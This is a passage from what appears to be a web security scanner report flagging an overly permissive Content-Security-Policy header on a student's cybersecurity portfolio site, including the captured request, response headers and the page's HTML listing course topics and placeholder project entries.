          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        2. GET https://beekmans.dev/
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
